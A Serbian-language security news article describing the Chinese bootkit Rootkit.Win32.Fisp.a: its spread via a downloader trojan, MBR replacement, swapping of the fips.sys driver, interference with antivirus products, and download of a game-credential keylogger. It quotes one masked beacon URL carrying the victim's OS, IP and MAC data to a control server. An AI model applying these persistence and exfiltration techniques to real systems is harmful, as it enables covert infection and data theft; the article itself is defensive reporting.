Pratite nas preko RSS-aNovi kineski bootkit - Rootkit.Win32.Fisp.a
Opisi virusa, 12.04.2011, 09:27 AM
Kaspersky Laboratorija identifikovala je novi štetni program - bootkit, kernel mod rootkit-a koji za sada pogađa samo kineske internet korisnike.
Bootkit nazvan Rootkit.Win32.Fisp.a se distribuira pomoću downloader Trojanca (Trojan-Downloader.NSIS.Agent.jd) koji kompjutere korisnika inficira kada pokušaju da preuzmu video snimak sa kineskog pornografskog sajta.
Među fajlovima koji se preuzimaju pomoću downloader Trojanca nalazi se i dropper Rootkit.Win32.Fisp, štetni fajl koji inficira boot sektor hard diska.
Bootkit snima stari MBR (master boot record) u trećem sektoru i zamenjuje ga sopstvenim. Počev od četvrtog sektora, on instalira enkriptovani drajver i ostatak koda (klikni na sliku radi uvećanja):
Fragment sa početka hard diska zaražen bootkit-om: Rootkit.Win32.Fisp.a
Kada se kompjuter startuje, štetni kod se izvršava i ponovo vraća originalni MBR kako bi se Windows učitao bez opasnosti od otkrivanja bootkit-a.
Kada je određeni deo sistema pokrenut, bootkit presreće funkciju ExVerifySuite. On tada zamenjuje sistemski drajver fips.sys štetnim drajverom koji se nalazi zapisan na početku hard diska u enkriptovanom obliku. Drajver fips.sys nije neophodan kako bi sistem funkcionisao normalno, tako da neće doći do pada sistema kada se ovaj drajver zameni štetnim drajverom.
Drajver detektuje brojne antivirusne programe i ometa ih u onome što bi inače trebalo da rade. Između ostalih, to se dešava AV programima proizvođača TrendMicro, BitDefender, AVG, Symantec, Kasperksy Lab, ESET i nekolicini kineskih programa.
Drajver kompromituje explorer.exe proces i ubacuje u računar varijantu bootkit-a koja takođe ima funkciju downloader-a. Štetni program šalje zahteve ka serveru i prenosi podatke o zaraženom kompjuterskom operativnom sistemu, IP adesi, MAC adresi itd., što izgleda ovako:
http://ab.*****.com:8081/tj.aspx?a=Windows XP Service Pack 2&b=192.168.0.16&c=00-00-00-00-00-00&f=
none&g=none&k=a&h=62&i=2&j=0321-01
Između ostalog, rootkit kasnije preuzima Trojan-Dropper.Win32.Vedio.dgs i Trojan-GameThief.Win32, keylogger koji krade podatke korisičkih naloga online igrice LineAge2.
Šematski prikaz infekcije
Izdvojeno
Čudni malver sprečava zaražene da posećuju piratske sajtove
Sajber kriminalci često koriste piratski softver za širenje malvera inficirajući one koji misle da preuzimaju najnoviju igru ili film. Međutim, is... Dalje
Microsoft upozorio na lažni ransomware StrRAT
Microsoft je na Twitteru upozorio korisnike na malver StrRAT koji krade lozinke sa zaraženog sistema, ali zanimljivo je da pored toga malver nazivima... Dalje
Novi trojanac ToxicEye koristi aplikaciju Telegram za špijuniranje i krađu podataka korisnika
Sajber kriminalci sve češće zloupotrebljavaju Telegram za kontrolu i upravljanje malverima i krađu informacija sa ciljanih sistema. ToxicEye je no... Dalje
Sajber kriminalci koriste kontakt forme na veb sajtovima za širenje trojanca IcedID
Istraživači iz kompanije Microsoft upozorili su na novu fišing kampanju u kojoj napadači koriste obrasce za kontakt (“Kontaktirajte nas&rdqu... Dalje
Novi malver CopperStealer krade Google, Facebook i Apple naloge
Istraživači kompanije Proofpoint otkrili su malver koji se distribuira preko sajtova na kojima se nudi nelegalni piratski softver, a koji cilja kori... Dalje
Pratite nas
Nagrade
Prijatelji
